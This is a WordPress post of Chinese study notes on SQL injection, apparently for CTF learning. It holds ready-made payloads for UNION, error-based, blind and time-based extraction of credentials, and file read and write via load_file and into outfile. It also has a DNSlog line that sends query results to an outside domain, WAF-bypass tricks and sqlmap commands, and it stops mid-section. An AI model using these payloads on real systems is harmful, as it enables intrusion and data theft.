{"id":8,"date":"2023-02-17T13:32:18","date_gmt":"2023-02-17T05:32:18","guid":{"rendered":"http:\/\/123.207.45.199\/?p=8"},"modified":"2026-05-31T21:59:24","modified_gmt":"2026-05-31T13:59:24","slug":"8","status":"publish","type":"post","link":"https:\/\/www.redspear.cn\/index.php\/2023\/02\/17\/8\/","title":{"rendered":"sql\u6ce8\u5165"},"content":{"rendered":"\n
\u6570\u636e\u5e93\u8bed\u53e5
mysql:  select from table limit 5;
mssql\/sqlsever: select top 5 from table;
oracle: select from table where rounum >=5<\/pre>\n\n\n\n
sql\u6ce8\u5165<\/h4>\n\n\n\n
==>sql\u4ee3\u7801<\/p>\n\n\n\n
\u53ea\u8981\u529f\u80fd\u70b9\u548c\u6570\u636e\u5e93\u4ea4\u4e92\u7684\u5730\u65b9\u90fd\u6709\u53ef\u80fd\u5b58\u5728SQL\u6ce8\u5165   <\/pre>\n\n\n\n
\u539f\u7406<\/h5>\n\n\n\n
SQL\u6ce8\u5165\u653b\u51fb\u662f\u901a\u8fc7\u64cd\u4f5c\u8f93\u5165\u6765\u4fee\u6539SQL\u8bed\u53e5\uff0c\u7528\u4ee5\u8fbe\u5230\u6267\u884c\u4ee3\u7801\u5bf9WEB\u670d\u52a1\u5668\u8fdb\u884c\u653b\u51fb\u7684\u65b9\u6cd5\u3002<\/pre>\n\n\n\n
\u6839\u636e\u6570\u636e\u7c7b\u578b\u5212\u5206*<\/h5>\n\n\n\n
\u6574\u578b\u6ce8\u5165\uff08\u4e0d\u9700\u8981\u95ed\u5408\uff0c\u4e0d\u4e00\u5b9a\u9700\u8981\u6ce8\u91ca\uff09\u5efa\u8bae\u6bcf\u6b21\u90fd\u52a0\u6ce8\u91ca
\u5b57\u7b26\u4e32\u7c7b\u578b\u6ce8\u5165\uff08\u9700\u8981\u95ed\u5408\uff0c\u6216\u8005\u9700\u8981\u6ce8\u91ca\uff09
\u641c\u7d22\u578b             \u52a0\u5bc6\u578b
\u5982\u4f55\u5224\u65ad?
\u7b2c\u4e00\u79cd
and 1=1\u548cand 1=2
\u7b2c\u4e8c\u79cd (\u6700\u597d\u7528\u51cf  \u6709\u4e9b\u6d4f\u89c8\u5668\u52a0\u53f7\u4f1a\u88ab\u8f6c\u8bd1\u4e3a\u7a7a\u683c) **
+1\u548c-1
\u7b2c\u4e09\u79cd 
'\" 
\u7b2c\u56db\u79cd 
and sleep(5)
\u200b
\u5224\u65ad\u662f\u5426\u5b58\u5728\u6ce8\u5165
\/\u5355\u53cc\u5f15\u53f7\u3001\u8fd0\u7b97\u7b26(+-*\/)\u3001?id=3' and'1'='2\/?id=3'and'1'='1
\u200b
\u5224\u65ad\u95ed\u5408\u65b9\u5f0f
1.\u901a\u8fc7\\(\u8f6c\u4e49\u5b57\u7b26)\u6765\u5224\u65adSQL\u6ce8\u5165\u7684\u95ed\u5408\u65b9\u5f0f    \u901a\u8fc7\u62a5\u9519\u4fe1\u606f\u5224\u65ad
2.'\" \u6709\u65e0\u62a5\u9519\u4fe1\u606f
\u770b\u95ed\u5408\u7b26\u91cc\u662f\u5141\u8bb8\u591a\u4e2a\u62ec\u53f7\u7ec4\u5408\u6210\u95ed\u5408\u7b26\u7684\uff0c\u5177\u4f53\u8981\u5224\u65ad\u6709\u591a\u5c11\u4e2a\u62ec\u53f7\uff0c\u53ef\u4ee5\u4f7f\u7528\u4e8c\u5206\u6cd5\u6765\u5feb\u901f\u5224\u65ad\u3002
\u200b
\u200b<\/pre>\n\n\n\n
\u6839\u636e\u6ce8\u5165\u7684\u7c7b\u578b\u5206\u7c7b<\/h5>\n\n\n\n
UNION query SQL injection(\u53ef\u8054\u5408\u67e5\u8be2\u6ce8\u5165)
Error-based SQL injection(\u62a5\u9519\u578b\u6ce8\u5165)
Boolean-based blind SQL injection(\u5e03\u5c14\u578b\u6ce8\u5165)
Time-based blind SQL injection(\u57fa\u4e8e\u65f6\u95f4\u5ef6\u8fdf\u6ce8\u5165)
Wide char SQL injection(\u5bbd\u5b57\u8282\u6ce8\u5165)
Twice SQL injection(\u4e8c\u6b21\u6ce8\u5165)
Stacked queries SQL injection(\u53ef\u591a\u8bed\u53e5\u67e5\u8be2\u6ce8\u5165)\u5806\u53e0\u6ce8\u5165 => 5.0\u4ee5\u4e0b\u7248\u672c
select * from user where id=1; sql\u8bed\u53e5
\u200b
\u8865:
access\u6570\u636e\u5e93  =>\u504f\u79fb\u6ce8\u5165
DNSlog\u5916\u5e26\u6ce8\u5165  <\/pre>\n\n\n\n
mysql\u8865\u5145<\/h5>\n\n\n\n
mysql\u6ce8\u91ca<\/h6>\n\n\n\n
# (url\u7f16\u7801\u4e3a %23)
\u200b
--+   (--\u540e\u9762\u9700\u8ddf\u4e0a\u4e00\u4e2a\u6216\u591a\u4e2a\u7a7a\u683c)  \u7a7a\u683c(url\u7f16\u7801\u4e3a%20)
\u200b
\/*.....*\/       \u7ed5waf\u7528   \/*!\u6570\u5b57...*\/
\u5982\u679c\u6570\u5b57(5\u4f4d)\u5927\u4e8e\u5f53\u524dmysql\u7248\u672c\u53f7  \u6ce8\u91ca\u751f\u6548
\u5426\u5219\u4e0d\u751f\u6548 waf\u7ed5\u8fc7<\/pre>\n\n\n\n
\u5e38\u7528\u51fd\u6570<\/h6>\n\n\n\n
\u67e5\u770b\u7528\u6237
select user()
select  system_user()
select current_user()
select SESSION_USER()
\u200b
\u67e5\u8be2\u5f53\u524d\u6570\u636e\u5e93\u540d\u79f0
select database()   
\u200b
\u67e5\u8be2\u5f53\u524d\u7248\u672c
select version()
select @@version
\u200b
mysql\u5b89\u88c5\u8def\u5f84*
select @@basedir
\u200b
\u6570\u636e\u5e93\u5b58\u50a8\u6570\u636e\u8868\u4f4d\u7f6e*
select @@datadir
\u200b
\u67e5\u770b\u64cd\u4f5c\u7cfb\u7edf
select  @@version_compile_os<\/pre>\n\n\n\n
\u7d22\u5f15\u5e93\u53ca\u5176\u8868\u548c\u5b57\u6bb5<\/p>\n\n\n\n
5.0\u4ee5\u4e0a\u624d\u6709,\u53ef\u4ee5\u591a\u7528\u6237\u591a\u64cd\u4f5c
information_schema\u5e93
SCHEMATA\u8868
\u5b57\u6bb5: SCHEMA_NAME
TABLES\u8868
\u5b57\u6bb5:TABLE_SCHEMA TABLE_NAME
COLUMNS\u8868
\u5b57\u6bb5:TABLE_SCHEMA TABLE_NAME COLUMN_NAME
5.0\u4ee5\u4e0b,\u5355\u7528\u6237<\/pre>\n\n\n\n
\u5982\u4f55\u9632\u6b62SQL\u6ce8\u5165*<\/h6>\n\n\n\n
\u6ce8\u610f: \u6570\u636e\u5e93\u540d\u79f0\u53ef\u4ee5\u7528\u5341\u516d\u8fdb\u5236\u6765\u4ee3\u66ff\u5b57\u7b26\u4e32\uff0c\u8fd9\u6837\u53ef\u4ee5\u7ed5\u8fc7\u5355\u5f15\u53f7\u7684\u9650\u5236     addslashes()\u51fd\u6570\u5728\u6307\u5b9a\u7684\u9884\u5b9a\u4e49\u5b57\u7b26('\" \\ null)\u524d\u6dfb\u52a0\u53cd\u659c\u6760 \u9488\u5bf9\u5b57\u7b26\u578b\u8fdb\u884c\u8fc7\u6ee4
mysql_escape_string() \u5df2\u5f03\u7528   
intval()    \u9488\u5bf9\u6574\u578b\u8fdb\u884c\u8fc7\u6ee4
PDO\u9884\u5904\u7406\u65b9\u5f0f
\u8f6c\u6362\u540e\u9700\u8981\u52a0\u6807\u8bc6 \u5982\u5341\u516d\u8fdb\u5236\u8981\u52a00x... \u4e8c\u8fdb\u5236\u8981\u52a00b...
\u5f00\u542fgpc 
\u200b
\u8865:\u786e\u5b9a\u6bcf\u4e2a\u6570\u636e\u7684\u7c7b\u578b
\u9650\u5236\u4f20\u5165\u6570\u636e\u7684\u957f\u5ea6
\u4e25\u683c\u9650\u5236\u7528\u6237\u4f7f\u7528\u6570\u636e\u5e93\u7684\u6743\u9650
\u200b
\u200b
ascii
0x3D =      0x20 \u7a7a\u683c<\/pre>\n\n\n\n
union \u5fc5\u987b\u5305\u542b\u76f8\u540c\u7684\u5217\u6570<\/p>\n\n\n\n
order by  \u53ef\u4ee5\u67e5\u770b\u5217\u6570
limit   \u4e00\u4e2a\u4e00\u4e2a\u6253\u5370\u51fa\u6765\u5e93\u540d 
group_concat()  \u4e00\u6b21\u6027\u5168\u90e8\u6253\u5370<\/pre>\n\n\n\n
\u8bfb\u5199\u51fd\u6570*<\/h6>\n\n\n\n
\u524d\u63d0:
1.\u77e5\u9053\u6587\u4ef6\u7edd\u5bf9\u8def\u5f84
2.\u80fd\u591f\u4f7f\u7528union\u67e5\u8be2
3.\u5bf9web\u76ee\u5f55\u6709\u8bfb\u5199\u6743\u9650\uff08\u57fa\u672c\u53ea\u6709root\u6743\u9650\u624d\u6709\u8fd9\u4e2a\u6743\u9650)
4.\u5bfc\u5165,\u5bfc\u51fa\u4e0d\u4e3anull   show variables like '%secure_file_priv%';
\u5728my.ini\u4e2d\u914d\u7f6e  secure_file_priv= 
NULL    \u4e0d\u5141\u8bb8\u5bfc\u5165\u4e5f\u4e0d\u5141\u8bb8\u5bfc\u51fa\uff08\u4e0d\u80fd\u8bfb\u53d6\u4e5f\u4e0d\u80fd\u5199\u5165\uff09
\u7a7a   \u53ef\u4ee5\u5bfc\u5165\u4e5f\u53ef\u4ee5\u5bfc\u51fa\u4e14\u6587\u4ef6\u4f4d\u7f6e\u4e0d\u9650\u5236
\u7edd\u5bf9\u8def\u5f84    \u5bfc\u5165\u548c\u5bfc\u51fa\u90fd\u53ea\u80fd\u5728\u8fd9\u4e2a\u8def\u5f84\u4e0b\u8fdb\u884c
5.\u6ca1\u6709\u5bf9\u5355\u53cc\u5f15\u53f7\u8fdb\u884c\u8fc7\u6ee4()\/\u5168\u5c40\u672a\u5f00\u542fgpc\u529f\u80fd  magic_quote_gpc
\u200b
\u8bfb\u53d6\u6587\u4ef6  load_file
select load_file('\u7edd\u5bf9\u8def\u5f84')  \u53cd\u659c\u6760\u524d\u8981\u52a0\u4e2a\u53cd\u659c\u6760\/\u76f4\u63a5\u7528\u6b63\u659c\u6760
\u200b
\u5199\u5165\u6587\u4ef6   into outfile\/into dumpfile   
select '\u6587\u4ef6\u5185\u5bb9'  into outfile '\u7edd\u5bf9\u8def\u5f84'
select '\u6587\u4ef6\u5185\u5bb9'  into dumpfile '\u7edd\u5bf9\u8def\u5f84'
\u6587\u4ef6\u5185\u5bb9\u53ef\u4ee5\u4f7f\u75280b\u4e8c\u8fdb\u5236\u7f16\u7801,0x\u5341\u516d\u8fdb\u5236\u7f16\u7801,\u7edd\u5bf9\u8def\u5f84\u4e0d\u53ef\u4ee5
outfile\u51fd\u6570\u53ef\u4ee5\u5bfc\u51fa\u591a\u884c\uff0c\u800cdumpfile\u53ea\u80fd\u5bfc\u51fa\u4e00\u884c\u6570\u636e
outfile\u51fd\u6570\u5728\u5c06\u6570\u636e\u5199\u5230\u6587\u4ef6\u91cc\u65f6\u6709\u7279\u6b8a\u7684\u683c\u5f0f\u8f6c\u6362\uff0c\u800cdumpfile\u5219\u4fdd\u6301\u539f\u6570\u636e\u683c\u5f0f   (\u63d0\u6743\u7528dumpfile)<\/pre>\n\n\n\n
\u6ce8\u5165\u6d41\u7a0b<\/h5>\n\n\n\n
\u5e38\u7528\u573a\u666f<\/p>\n\n\n\n
\u767b\u5f55\u6ce8\u518c –union –\u8054\u5408\u6ce8\u5165<\/p>\n\n\n\n
\u6587\u7ae0 –\u62a5\u9519\/\u5e03\u5c14\/\u65f6\u95f4<\/p>\n\n\n\n
\u6839\u636e\u6240\u9700\u62ff\u5230\u4e00\u4e9b\u6570\u636e\u5e93<\/p>\n\n\n\n
\u7136\u540e \u8fdb\u884c\u8bfb\u53d6\u6587\u4ef6 \u6587\u4ef6\u4e0a\u4f20<\/p>\n\n\n\n
\u8054\u5408\u6ce8\u5165<\/h6>\n\n\n\n
\u6709\u663e\u793a\u4f4d<\/p>\n\n\n\n
1.\u9996\u5148\u5224\u65ad\u662f\u6574\u578b\u8fd8\u662f\u5b57\u7b26\u578b(\u56e0\u4e3a\u8981\u8003\u8651\u662f\u5426\u9700\u8981\u95ed\u5408)
2.\u5224\u65ad\u5217\u6570    \u5982 order by  3
3.\u4f7f\u7528\u5360\u4f4d\u7b26  \u5982 union select 1,2,3
4.\u7206\u5e93    union select database(),2,3 --+
5.\u7206\u8868    union select group_concat(table_name) from information_schema.tables where table_schema=database() --+
6.\u7206\u5b57\u6bb5   union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='\u8868\u540d'    --+
7.\u5b57\u6bb5\u503c   union select group_concat(username,0x3D,password) from \u8868\u540d --+<\/pre>\n\n\n\n
\u62a5\u9519\u6ce8\u5165<\/h6>\n\n\n\n
\u6ca1\u6709\u56de\u663e\u4f4d,\u4f46\u6709\u62a5\u9519\u4fe1\u606f<\/p>\n\n\n\n
\u57fa\u7840\u51fd\u6570<\/p>\n\n\n\n
ceil    \u5411\u4e0a\u53d6\u6574
floor   \u5411\u4e0b\u53d6\u6574
rand    \u968f\u673a\u53d6\u503c
concat  \u8fd4\u56de\u7ed3\u679c\u4e3a\u8fde\u63a5\u53c2\u6570\u4ea7\u751f\u7684\u5b57\u7b26\u4e32\u3002
substr()\/substring()\/mid() \u4e09\u4e2a\u53c2\u6570
left()               \u4e24\u4e2a\u53c2\u6570
\u200b
payload\u4e3a\u9700\u8981\u83b7\u53d6\u5185\u5bb9\u7684\u811a\u672c
1.\u901a\u8fc7floor\u62a5\u9519
select count(*),concat((payload),floor(rand(0)*2))x from users group by x
\u200b
2.\u901a\u8fc7extractvalue()\u62a5\u9519    2   \u4ece\u76ee\u6807XML\u4e2d\u8fd4\u56de\u5305\u542b\u6240\u67e5\u8be2\u503c\u7684\u5b57\u7b26\u4e32\u3002
extractvalue(1,concat(0x7e,payload(),0x7e)
\u83b7\u53d6\u6240\u6709\u8868
(select distinct concat(0x7e,(select group_concat(table_name)),0x7e)from information_schema.tables where table_schema='security')
(select distinct concat(0x7e,(select group_concat(column_name)),0x7e)from information_schema.columns where table_schema='security' and table_name='users')
\u200b
\u7b2c\u4e00\u4e2a\u53c2\u6570\uff1aXML_document\u662fstring\u683c\u5f0f\uff08\u5982\u679c\u6211\u4eec\u4e0d\u5199\u5b57\u7b26\u4e32\u683c\u5f0f\u800c\u5199\u4e00\u4e2a\u6570\u5b571,\u90a3\u4e48\u5c31\u4f1a\u62a5\u9519\uff0c\u5c06\u540e\u9762\u7684\u8bed\u53e5\u67e5\u8be2\u51fa\u6765.)
\u7b2c\u4e8c\u4e2a\u53c2\u6570\uff1aXPath_string(Xpath\u683c\u5f0f\u7684\u5b57\u7b26\u4e32)
\u200b
3\u3001\u901a\u8fc7UpdateXML()\u62a5\u9519   3
and UpdateXML(1,concat(0x7e,(payload),0x7e)),1)
\u200b
\u8865\u5145: \u5e38\u89c1\u62a5\u9519\u51fd\u6570\u53ef\u80fd\u4f1a\u88abwaf\u62e6\u622a 
1.ST_LatFromGeoHash()
and ST_LatFromGeoHash(concat(0x7e,(payload),0x7e))--+
\u200b
2.ST_LongFromGeoHash()
and ST_LongFromGeoHash(concat(0x7e,(payload),0x7e))--+
\u200b
3.ST_PointfromgeoHash()
and ST_Pointfromgeohash(concat(0x7e,(payload),0x7e),1)--+<\/pre>\n\n\n\n
floor \u62a5\u9519\u539f\u7406<\/p>\n\n\n\n
floor(rand(0)*2 \u7684\u4f5c\u7528\u5c31\u662f\u4ea7\u751f\u9884\u77e5\u7684\u6570\u5b57\u5e8f\u521701101\uff0c\u7136\u540e\u518d\u5229\u7528 rand() \u7684\u7279\u6b8a\u6027\u548c group by \u7684\u865a\u62df\u8868\uff0c\u6700\u7ec8\u5f15\u8d77\u4e86\u62a5\u9519\u3002
\u200b
group by\u548ccount\u4e00\u8d77\u4f7f\u7528\u65f6\uff0c\u4f1a\u751f\u6210\u4e00\u5f20\u865a\u62df\u7684\u8868
\u5148\u8fd0\u7b97\u7b2c\u4e00\u6b21\uff0c\u7b2c\u4e00\u6b21\u7684\u7ed3\u679c\u4e3a0,\u67e5\u5230\u7ed3\u679c\u540e\u5c31\u9700\u8981\u53bb\u865a\u62df\u673a\u6dfb\u52a0\u6570\u636e\uff08\u5982\u679c\u865a\u62df\u8868\u6ca1\u6709\u8be5\u6570\u636e\uff0c\u5c06\u8fd0\u7b97\u7b2c\u4e8c\u6b21\uff0c\u5982\u679c\u6709\u5c31\u4e0d\u9700\u8981\u8fd0\u884c\u7b2c\u4e8c\u6b21)<\/pre>\n\n\n\n
1.\u9996\u5148\u5224\u65ad\u662f\u6574\u578b\u8fd8\u662f\u5b57\u7b26\u578b(\u56e0\u4e3a\u8981\u8003\u8651\u662f\u5426\u9700\u8981\u95ed\u5408)
2.and(select 1 from (select count(*),concat(concat(payload),floor(rand(0)*2))x from information_schema.tables group by x)y)--+      
\/\/payload\u4e3a\u9700\u8981\u83b7\u53d6\u5185\u5bb9\u7684\u811a\u672c<\/pre>\n\n\n\n
\u5e03\u5c14\u6ce8\u5165<\/h6>\n\n\n\n
\u4f18\u70b9\uff1a\u4e0d\u9700\u8981\u663e\u793a\u4f4d\uff0c\u4e0d\u9700\u8981\u51fa\u9519\u4fe1\u606f(\u62a5\u9519\u4fe1\u606f\u4e0d\u5168)\u3002 \u7f3a\u70b9: \u901f\u5ea6\u6162\uff0c\u8017\u8d39\u5927\u91cf\u65f6\u95f4\u3002<\/p>\n\n\n\n
\u5e38\u7528\u51fd\u6570<\/p>\n\n\n\n
length(\u957f\u5ea6)
exists() \u68c0\u6d4b\u662f\u5426\u5b50\u67e5\u8be2\u662f\u5426\u8fd4\u56de\u6570\u636e
ascii()\/ord()  \u8fd4\u56deascii\u7801  
regexp ''     \u5339\u914d    like '' \u5168\u79f0<\/pre>\n\n\n\n
\u5e38\u7528\u8bed\u53e5<\/p>\n\n\n\n
\u5224\u65ad\u7248\u672c\u662f\u5426\u5927\u4e8e5.0   \u82e5\u7ed3\u679c\u4e3a0     \u5373\u53ef\u4f7f\u7528\u5806\u53e0\u6ce8\u5165..
and exists(select from information schema.tables)--+
\u5224\u65ad\u6570\u636e\u5e93\u4e2a\u6570
and (select count(table_schema) from information_schema.tables) > ?<\/pre>\n\n\n\n
\u6ce8\u5165\u6d41\u7a0b<\/p>\n\n\n\n
1.\u5224\u65ad\u95ed\u5408
2.\u5224\u65ad\u7b2c\u4e00\u4e2a\u5e93\u7684\u7b2c\u4e00\u4e2a\u5b57 
and (select ascii(substr((select schema_name from
information_schema.SCHEMATA limit 0,1),1,1)))>? --+<\/pre>\n\n\n\n
\u65f6\u95f4\u6ce8\u5165<\/h6>\n\n\n\n
\u4f18\u70b9\uff1a\u4e0d\u9700\u8981\u663e\u793a\u4f4d\uff0c\u4e0d\u9700\u8981\u51fa\u9519\u4fe1\u606f\u3002<\/p>\n\n\n\n
\u52a0\u5165sleep(5)\u540e\u9875\u9762\u4f1a\u6709\u660e\u663e\u5ef6\u8fdf<\/p>\n\n\n\n
\u7f3a\u70b9: \u901f\u5ea6\u6162.<\/p>\n\n\n\n
\u6ce8\u5165\u6d41\u7a0b<\/p>\n\n\n\n
1.\u5224\u65ad\u6ce8\u5165\u70b9
2.\u95ed\u5408\u8bed\u53e5
3.and if(ascii(substr(payload),1,1)=?,sleep(5),1)
\u200b<\/pre>\n\n\n\n
\u5bbd\u5b57\u8282\u6ce8\u5165<\/h6>\n\n\n\n
\u5b57\u7b26\u96c6\u4e3agbk\u65f6\u53ef\u4ee5\u4f7f\u7528    %df \u52a0\u4e0a\u95ed\u5408\u7684\u7b26\u53f7 \u53ef\u7528\u4e8e\u7ed5\u8fc7addslashes()<\/pre>\n\n\n\n
\u4e8c\u6b21\u6ce8\u5165<\/h6>\n\n\n\n
\u4e00\u6b21\u6ce8\u5165:\u5c06\u5e26\u6709sql\u98ce\u9669\u7684\u6570\u636e\u5199\u5165\u6570\u636e\u5e93   (\u63d2\u5165\u66f4\u65b0)
\u4e8c\u6b21\u6ce8\u5165:\u8bfb\u53d6\u5e26\u6709sql\u98ce\u9669\u6570\u636e\u5b9e\u73b0\u5230\u4e86\u6ce8\u5165  (\u63d2\u5165,\u66f4\u65b0,\u5220\u9664,(\u63d2\u5165))     
\u5f00\u59cb\uff1a\u4fe1\u606f\u8fdb\u884c\u5b58\u50a8\/\u4fee\u6539\u9020\u6210\u4e8c\u6b21\u6ce8\u5165\u98ce\u9669
\u8fc7\u7a0b\uff1a\u8bbf\u95ee\u8fd9\u4e9b\u70b9\u5224\u65ad\u662f\u5426\u5b58\u5728
\u7ed3\u5c3e\uff1a\u5229\u7528
unifish
\u5b58\u5728\u4e8e\u8bc4\u8bba\u6587\u7ae0\u7ed3\u5408  =>\u4e24\u4e2a\u6ce8\u5165\u70b9\u5e94\u8be5\u662f\u8fde\u8d2f\u7684<\/pre>\n\n\n\n
\u5806\u53e0\u6ce8\u5165<\/h6>\n\n\n\n
\u6761\u4ef6:
mysqli_multi_query()  \u652f\u6301\u540c\u65f6\u6267\u884c\u591a\u6761sql\u8bed\u53e5
mysqli_query() \u652f\u6301\u6267\u884c\u5355\u6761sql\u8bed\u53e5
;\u672a\u88ab\u8fc7\u6ee4
https:\/\/buuoj.cn\/challenges<\/pre>\n\n\n\n
DNS\u5229\u7528<\/h6>\n\n\n\n
http:\/\/www.dnslog.cn\/
and() 
select load_file(concat('\\\\\\\\',(select (paload)),'.\u57df\u540d\\\\abc'));
\u200b
2.\u5e94\u7528\u573a\u666f\uff1a
\u89e3\u51b3\u4e0d\u56de\u663e\uff0c\u53cd\u5411\u8fde\u63a5\uff0cSQL\u6ce8\u5165\uff0c\u547d\u4ee4\u6267\u884c\uff0cSSRF\u7b49
dns\u4e0d\u80fd\u653e\u8fc7\u957f\u7684payload<\/pre>\n\n\n\n\n\n
http\u5934\u6ce8\u5165<\/h6>\n\n\n\n
\u200b<\/pre>\n\n\n\n
\u7ed5waf<\/h5>\n\n\n\n
\u9488\u5bf9 \u5355\u53cc\u5f15\u53f7\u3001\u7a7a\u683c\u3001\u5173\u952e\u5b57\u3001\u6bd4\u8f83\u3001\u6ce8\u91ca\u8fdb\u884c\u8fc7\u6ee4<\/p>\n\n\n\n
\u5355\u53cc\u5f15\u53f7 =>\u5341\u516d\u8fdb\u5236 hex() unhex()<\/p>\n\n\n\n
\u7a7a\u683c =>\/**\/,(),\u8f6c\u4e49<\/p>\n\n\n\n
\u5173\u952e\u5b57=>\u5927\u5c0f\u5199\u7ed5\u8fc7,\u53cc\u5199\u7ed5\u8fc7,\u66ff\u4ee3\u5173\u952e\u5b57 ,\u9884\u7f16\u8bd1<\/p>\n\n\n\n
\u6bd4\u8f83=> \u7528greatest\u51fd\u6570\u66ff\u4ee3\u5927\u4e8e\u53f7 \u7528least\u51fd\u6570\u4ee3\u66ff\u5c0f\u4e8e\u53f7 strcmp\u4ee3\u66ff\u5b57\u7b26\u4e32\u6bd4\u8f83<\/p>\n\n\n\n
\u6ce8\u91ca\u8fdb\u884c\u8fc7\u6ee4=>\u53ef\u4ee5\u7528and\u52a0\u4e0a\u95ed\u5408\u7684\u7b26\u53f7<\/p>\n\n\n\n
\u5982\u679c\u4ee3\u7801\u5757\u5b58\u5728url\u89e3\u7801 \u90a3\u4e48\u53ef\u4ee5\u5c06sql\u8bed\u53e5\u8f6c\u6362\u4e3aurl\u7801\u8fdb\u884c<\/p>\n\n\n\n
\u5982\u679c\u5b57\u7b26\u7f16\u7801\u4e3agbk\u65f6 \u53ef\u4ee5\u4f7f\u7528\u5bbd\u5b57\u8282\u7ed5\u8fc7<\/p>\n\n\n\n
\u9017\u53f7\u8fc7\u6ee4=>\u9488\u5bf9\u4e00\u4e9b\u51fd\u6570\u53ef\u4ee5\u7528\u8bed\u53e5\u8fdb\u884c\u66ff\u4ee3 \u5982substr(from for) limit 0offset1<\/p>\n\n\n\n
\u200b<\/pre>\n\n\n\n
\u5185\u8054\u6ce8\u91ca\u7b49\u7b49<\/p>\n\n\n\n
\u7ed5\u8fc7\u65b9\u6cd5\uff1a \u5927\u5c0f\u5199\u3001\u66ff\u6362\u5173\u952e\u5b57\u3001\u51fd\u6570\u3001\u7f16\u7801\/\u8fdb\u5236\u3001Sql\u7279\u6027<\/p>\n\n\n\n
1.\u5927\u5c0f\u5199\u7ed5\u8fc7<\/p>\n\n\n\n
\u539f\u7406\u662f\u57fa\u4e8eSQL\u8bed\u53e5\u4e0d\u5206\u5927\u5c0f\u5199\u7684\uff0c\u4f46\u8fc7\u6ee4\u53ea\u8fc7\u6ee4\u5176\u4e2d\u4e00\u79cd\u3002<\/p>\n\n\n\n
2.\u66ff\u6362\u5173\u952e\u5b57\/\u53cc\u5199\u7ed5\u8fc7<\/p>\n\n\n\n
\u6b63\u5219\u8868\u8fbe\u5f0f\u4f1a\u66ff\u6362\u6216\u5220\u9664select\u3001union\u8fd9\u4e9b\u5173\u952e\u5b57\u5982\u679c\u53ea\u5339\u914d\u4e00\u6b21\u5c31\u5f88\u5bb9\u6613\u7ed5\u8fc7<\/p>\n\n\n\n
3.\u7a7a\u683c\u7ed5\u8fc7<\/p>\n\n\n\n
1)\u6ce8\u91ca\u7b26\u7ed5\u8fc7 \/**\/<\/p>\n\n\n\n
2) \u62ec\u53f7\u7ed5\u8fc7 ()<\/p>\n\n\n\n
3)\u8f6c\u4e49\u7ed5\u8fc7 \u6362\u884c%0a %20<\/p>\n\n\n\n
4.\u5185\u8054\u6ce8\u91ca(\u5173\u952e\u5b57)<\/p>\n\n\n\n
5.URL\u7f16\u7801<\/p>\n\n\n\n
\u6709\u65f6\u540e\u53f0\u754c\u9762\u4f1a\u518d\u6b21URL\u89e3\u7801\u6240\u4ee5\u8fd9\u65f6\u53ef\u4ee5\u5229\u7528\u4e8c\u6b21\u7f16\u7801\u89e3\u51b3\u95ee\u9898 \u540e\u53f0\u8bed\u53e5 \u4ee3\u7801\u91cc\u6709urldecode\u89e3\u7801<\/p>\n\n\n\n
6.\u5341\u516d\u8fdb\u5236\u7ed5\u8fc7(\u5f15\u53f7\u8fc7\u6ee4)<\/p>\n\n\n\n
7.\u9017\u53f7\u7ed5\u8fc7<\/p>\n\n\n\n
\u76f2\u6ce8\u65f6\u9700\u8981\u7528\u5230\u7684\u5b57\u53e5\u65b9\u6cd5<\/p>\n\n\n\n
substr(”,1,1),mid(”,1,1) => from 1 for 1<\/p>\n\n\n\n
limit(0,1) => 0offset1<\/p>\n\n\n\n
8.\u6bd4\u8f83\u7b26\u7ed5\u8fc7(>,<)<\/p>\n\n\n\n
\u76f2\u6ce8\u65f6\uff0c\u5728\u4f7f\u7528\u4e8c\u5206\u67e5\u627e\u7684\u65f6\u5019\u9700\u8981\u4f7f\u7528\u5230\u6bd4\u8f83\u64cd\u4f5c\u7b26\u6765\u8fdb\u884c\u67e5\u627e\u3002<\/p>\n\n\n\n
select GREATEST(1,2,3) \/\/\u8f93\u51fa\u6700\u5927\u503c3<\/p>\n\n\n\n
select least(1,2,3) \/\/\u8f93\u51fa\u6700\u5c0f\u503c1<\/p>\n\n\n\n
select strcmp(‘aa’,’aaa’) \u5b57\u7b26\u4e32\u6bd4\u8f83 \u8f93\u51fa -1 \u7b49\u4e8e0\u5373\u4e3a\u76f8\u7b49<\/p>\n\n\n\n
\u8865:in, between, order by,like<\/p>\n\n\n\n
9.\u6ce8\u91ca\u7b26\u7ed5\u8fc7<\/p>\n\n\n\n
\u5728\u6ce8\u5165\u65f6\u7684\u6ce8\u91ca\u7b26\u4e00\u822c\u4e3a# –+\u5f53\u4e24\u8005\u4e0d\u80fd\u7528\u65f6\u5c31\u4e0d\u80fd\u95ed\u5408\u5f15\u53f7<\/p>\n\n\n\n
\u5c06\u6ce8\u91ca\u7b26\u6362\u4e3a\u95ed\u5408\u7b26\u53f7<\/p>\n\n\n\n
\u95ed\u5408\u4e3a’\u7684\u8bdd select * from users WHERE id=’1’\/1 (\u5e03\u5c14\u8bed\u53e5)\/’1′ =’1′<\/p>\n\n\n\n
10\u5bbd\u5b57\u8282\u7ed5\u8fc7<\/p>\n\n\n\n
\u5b57\u7b26\u7f16\u7801\u4e3agbk %df<\/p>\n\n\n\n
\u8865\u5145:base 64\u52a0\u5bc6\u591a\u4ee5\u7b49\u4e8e\u53f7\u7ed3\u5c3e<\/p>\n\n\n\n
11.with rollup<\/p>\n\n\n\n
12\u65e0\u5217\u540d\u6ce8\u5165<\/p>\n\n\n\n
\u7ed9\u672a\u77e5\u5217\u540d\u547d\u540d<\/p>\n\n\n\n
13.\u5224\u65ad\u5217\u6570\u7ed5\u8fc7<\/p>\n\n\n\n
SQLmap\u7684\u4f7f\u7528<\/h5>\n\n\n\n
\u6d41\u7a0b:<\/p>\n\n\n\n
1.-u \u67e5\u770b\u662f\u5426\u5b58\u5728\u6ce8\u5165<\/p>\n\n\n\n
2-u url –is-dba \u67e5\u770b\u6743\u9650<\/p>\n\n\n\n
    \n
  1. –proxy -user-agent<\/li>\n<\/ol>\n\n\n\n
    1.\u57fa\u7840\u547d\u4ee4<\/h6>\n\n\n\n
    –batch \u8df3\u8fc7\u8be2\u95ee<\/p>\n\n\n\n
    sqlmap -u \"\u7f51\u5740\"      \u5f97\u5230\u6570\u636e\u5e93,\u64cd\u4f5c\u7cfb\u7edf,\u670d\u52a1\u5668\u7b49\u7248\u672c\u4fe1\u606f
    \u200b
    sqlmap -u \"\u7f51\u5740\" --dbs    \u5217\u51fa\u6240\u6709\u6570\u636e\u5e93\u540d
    \u200b
    sqlmap -u \"\u7f51\u5740\"  -D \u6570\u636e\u5e93\u540d --tables
    \u200b
    sqlmap -u \"\u7f51\u5740\"  -T \u8868\u540d   --columns
    \u200b
